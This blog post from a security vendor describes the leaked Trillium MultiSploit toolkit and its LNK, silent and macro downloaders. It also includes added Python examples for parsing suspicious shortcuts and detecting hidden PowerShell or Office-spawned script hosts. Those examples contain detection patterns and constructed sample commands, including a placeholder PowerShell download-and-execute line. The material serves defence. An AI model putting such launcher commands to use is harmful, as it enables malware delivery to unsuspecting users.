Trillium Toolkit Leads to Widespread Malware

This blog was written by Oliver Devane and Mohinder Gill.

Any aspiring cybercriminal can buy one of many malicious toolkits to craft a downloader and distribute malware. After a time these downloaders are leaked to forums and other download sites and become available to the masses. This is often when we see a spike in their use.

The toolkit Trillium Security MultiSploit Tool v3 was cracked last week and uploaded onto several malicious forums.


Trillium was created by a coder using the same name. The program contains an EULA stating that it should not be used maliciously, but we are well aware that these types of kits are used for generating malware.


In order to use the builder, the user needs to acknowledge the EULA by clicking on a button. So we guess everyone who is using it is violating the policy.

Whenever you use the tool to create an exploit or a downloader you are reminded yet again not to use it maliciously.


Version 1 of this tool appeared for sale at the end of last year for US$300 on a popular hacking forum. Since then, it has been updated to Version 3.


This toolkit allows the user to create several types of downloaders. It breaks them down into three options:

  • Windows shortcut exploits
  • Silent exploit
  • Macro exploits

Windows shortcut exploits rename an executable to a specified filename and create a LNK file that launches it through PowerShell.

This type offers the option to use different icons and file extensions, all to trick the target into executing the LNK file.
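A defender's first question about a suspicious shortcut is what it actually launches. The following is an added example, not code from the Trillium toolkit or from the original post: a minimal parser for the Shell Link (.lnk) binary format that pulls out the target path, command-line arguments, icon location and window state, then flags the indicators described above (a PowerShell target, a hidden or minimized window, download and execute verbs). The sample shortcut it inspects is constructed in memory by the script; the argument string is a deliberately non-functional placeholder, and `example.invalid` is a reserved test domain.

```python
"""Triage .lnk files for the PowerShell-launcher pattern (added example)."""
import re
import struct
from dataclasses import dataclass

# ShellLinkHeader constants from the MS-SHLLINK specification.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # shortcut opens its window minimized, a common lure trick

# Indicator names and the regex that detects each in the resolved command line.
INDICATORS = {
    "powershell": r"powershell",
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "encoded_command": r"-e(?:nc(?:odedcommand)?)?\s",
    "download": r"downloadfile|downloadstring|invoke-webrequest|start-bitstransfer",
    "exec": r"\biex\b|invoke-expression|start-process",
}


@dataclass
class LnkInfo:
    show_command: int
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""


def parse_lnk(data: bytes) -> LnkInfo:
    """Walk header, optional ID list / LinkInfo, then the StringData block."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:                      # skip LinkTargetIDList (size prefix + items)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # skip LinkInfo (size field includes itself)
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)

    def read_string() -> str:
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]   # character count, no terminator
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        pos += nbytes
        return raw.decode("utf-16-le" if unicode else "cp1252")

    info = LnkInfo(show_command=show_cmd)
    # StringData entries appear in this fixed order, each only if its flag is set.
    for flag, attr in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                       (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                       (HAS_ICON, "icon_location")):
        if flags & flag:
            setattr(info, attr, read_string())
    return info


def assess_lnk(info: LnkInfo) -> list:
    """Return the indicator names that fire for this shortcut (empty list = nothing suspicious)."""
    text = " ".join((info.relative_path, info.working_dir, info.arguments))
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, text, re.I)]
    if info.show_command == SW_SHOWMINNOACTIVE:
        hits.append("minimized_window")
    return hits


def build_sample_lnk(target: str, arguments: str, show_command: int) -> bytes:
    """Construct a minimal .lnk (RelativePath + Arguments + IconLocation) for testing the parser."""
    flags = HAS_REL_PATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<II", flags, 0x20)
    header += b"\x00" * 24                                   # three zeroed FILETIMEs
    header += struct.pack("<IIIH", 0, 0, show_command, 0) + b"\x00" * 10  # size, icon idx, show, hotkey, reserved
    enc = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + enc(target) + enc(arguments) + enc(r"%SystemRoot%\System32\shell32.dll")


# Constructed samples: a lure-style launcher and an ordinary application shortcut.
SUSPICIOUS_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-NoProfile -WindowStyle Hidden -Command \"DownloadFile('http://example.invalid/stage2.exe'); "
    "Start-Process stage2.exe\"",  # placeholder, not a working command
    SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_sample_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "", 1)

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_LNK), ("benign", BENIGN_LNK)):
        info = parse_lnk(blob)
        print(label, "->", info.relative_path, "|", assess_lnk(info) or "clean")
```

On a real sample the same parser can be pointed at the bytes of a file from disk; a shortcut whose icon is borrowed from `shell32.dll` or an Office binary while its target resolves to `powershell.exe` is the combination the toolkit's icon and extension options produce, and the minimized window state is worth keeping as a separate signal because it is rare in legitimate user-created shortcuts.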

A silent exploit creates a file that downloads and executes a specified file from the Internet. The user can choose from the following file types:

*.chm, *.wsf, *.vbs, *.hta, *.htm, *.html, *.bat, *.cmd, *.ps1, *.psc1, *.exe, *.pif, *.scr, *.com, *.url, *.lnk

Depending on the chosen options, the toolkit will create one of the following files:

  • A PowerShell script
  • A Visual Basic executable
  • A Visual Basic script

The PowerShell script, executed with a hidden window, downloads and runs a file.

The Visual Basic executable downloads and executes a file.


The Visual Basic script again downloads and executes a file.


Macro exploits allow users to create a macro that will download and execute a file. This type of attack is very common today; we have seen it used to spread Dridex and other ransomware families. The tool can create several macro variants.
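Whichever output the toolkit produces, execution on the endpoint ends up as a script host (powershell.exe, wscript.exe, cscript.exe, mshta.exe) started either from a shortcut via explorer.exe or from an Office process via a macro. The following is an added example, not part of the original post: three process-creation rules that capture those behaviours, run over a handful of constructed log lines in a simple key=value layout (the field names `parent`, `image` and `cmdline` are this example's own, not those of any particular log product).

```python
"""Process-creation rules for the downloader patterns described above (added example)."""
import re

# Constructed process-creation events; the format is this example's own.
LOG_LINES = r"""
2016-01-03T10:12:05Z parent="C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline=powershell.exe -NoProfile -w hidden -c DownloadFile('http://example.invalid/a.exe')
2016-01-03T10:13:41Z parent="C:\Windows\explorer.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline=powershell.exe -WindowStyle Hidden -Command DownloadFile('http://example.invalid/b.exe')
2016-01-03T10:15:02Z parent="C:\Windows\explorer.exe" image="C:\Windows\System32\wscript.exe" cmdline=wscript.exe C:\Users\bob\AppData\Local\Temp\invoice.vbs
2016-01-03T10:16:30Z parent="C:\Windows\explorer.exe" image="C:\Program Files\Notepad++\notepad++.exe" cmdline="C:\Program Files\Notepad++\notepad++.exe" notes.txt
2016-01-03T10:20:11Z parent="C:\Windows\System32\cmd.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline=powershell.exe -NoProfile -File C:\scripts\inventory.ps1
""".strip().splitlines()

LINE_RE = re.compile(r'^(?P<ts>\S+)\s+parent="(?P<parent>[^"]*)"\s+image="(?P<image>[^"]*)"\s+cmdline=(?P<cmd>.*)$')

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
SCRIPT_INTERPRETERS = {"wscript.exe", "cscript.exe", "mshta.exe"}
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# Locations a phishing payload lands in; admin scripts rarely run from here.
USER_WRITABLE = re.compile(r"\\(?:users\\[^\\]+\\(?:appdata|downloads|desktop)|temp|programdata)\\", re.I)


def parse_event(line: str) -> dict:
    m = LINE_RE.match(line)
    if not m:
        raise ValueError("unparseable event: " + line)
    return m.groupdict()


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev: dict) -> list:
    """Return the names of every rule that matches this one event."""
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmd"]
    alerts = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        alerts.append("office_spawns_script_host")          # macro downloader
    if image == "powershell.exe" and HIDDEN_WINDOW.search(cmd):
        alerts.append("hidden_powershell")                  # LNK / silent-exploit launcher
    if image in SCRIPT_INTERPRETERS and USER_WRITABLE.search(cmd):
        alerts.append("script_host_from_user_writable_path")  # dropped .vbs/.wsf/.hta
    return alerts


def detect(lines) -> list:
    """Run every rule over every line; yields (timestamp, rule) pairs in log order."""
    results = []
    for line in lines:
        ev = parse_event(line)
        results.extend((ev["ts"], rule) for rule in evaluate(ev))
    return results


if __name__ == "__main__":
    for ts, rule in detect(LOG_LINES):
        print(ts, rule)
```

The last two constructed events are the controls: an application launched from explorer.exe and a PowerShell inventory script run from cmd.exe with a visible window produce no alert, which is the behaviour to verify before deploying rules like these so that ordinary administration does not drown the signal.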

We have already observed this toolkit being used to distribute malware, including spam campaigns that use the macro exploit component.

Detection
Intel Security has several drivers that detect the files created by this toolkit. Detection is included in DAT Versions 8094 and later.

  • Trojan-FHYT
  • Trojan-FHYU
  • W97M/Downloader.azi
  • W97M/Downloader.azj
  • W97M/Downloader.azk

We also recommend our customers read this blog containing preventive measures against Dridex. The advice should help mitigate some of the infections caused by malware created with this toolkit.

The post Trillium Toolkit Leads to Widespread Malware appeared first on McAfee.